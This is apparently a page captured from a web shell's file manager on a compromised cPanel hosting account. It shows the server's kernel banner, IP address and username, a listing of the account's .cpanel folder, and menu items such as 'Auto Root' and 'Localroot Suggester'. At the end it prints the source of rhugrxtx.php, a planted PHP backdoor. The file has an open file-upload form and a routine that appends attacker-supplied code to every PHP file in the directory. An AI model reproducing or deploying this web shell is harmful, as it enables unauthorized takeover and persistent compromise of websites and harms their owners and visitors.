Linux thaedus.aserv.co.za 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 197.242.159.149 & Your IP : 216.73.216.114
Domains :
Cant Read [ /etc/named.conf ]
User : bigpuxtb
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
bigpuxtb /
.cpanel /
Delete
Unzip
Name
Size
Permission
Date
Action
caches
[ DIR ]
drwx------
2021-10-05 07:00
datastore
[ DIR ]
drwxr-xr-x
2026-08-05 21:17
ea-php-cli
[ DIR ]
drwxr-xr-x
2025-07-23 10:22
nvdata
[ DIR ]
drwx------
2026-03-19 15:13
contactinfo
629
B
-rw-r--r--
2024-06-29 01:49
dns_dcv_lock
0
B
-rw-------
2022-01-26 07:57
dns_dcv_lock.lock-1e609e410b3d0-125e3b6db-7a14
42
B
-rw-------
2026-04-29 10:59
email_accounts.cache
569
B
-rw-r--r--
2015-10-19 20:54
email_accounts.json
905
B
-rw-------
2026-08-05 21:42
email_accounts.json-146436fd4318b-1f186e853-66ca
0
B
-rw-------
2019-08-29 22:23
email_accounts.json-199a48ddb5dad-5130b943-9e2d
0
B
-rw-------
2019-09-02 08:23
email_accounts.json-199d58c4bd441-1745b7353-2b60
0
B
-rw-------
2019-08-29 22:23
email_accounts.json-2ab607d28b271-737611d3-135ef
0
B
-rw-------
2019-08-29 22:23
email_accounts.json-3027c16fff61b-157b98159-d87f
0
B
-rw-------
2021-09-24 09:44
email_accounts.json-310ce3e0ccbe-504b6253-46b8
0
B
-rw-------
2019-08-29 22:23
email_accounts.json-330bec487e73d-89931493-8350
0
B
-rw-------
2019-08-29 22:33
email_accounts.yaml
637
B
-rw-r--r--
2015-07-29 16:46
email_accounts_count
1
B
-rw-------
2026-08-05 21:42
nvdata.cache
693
B
-rw-r-----
2026-03-19 15:13
rhugrxtx.php
760
B
-rw-r--r--
2026-01-07 15:23
Save
Rename
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>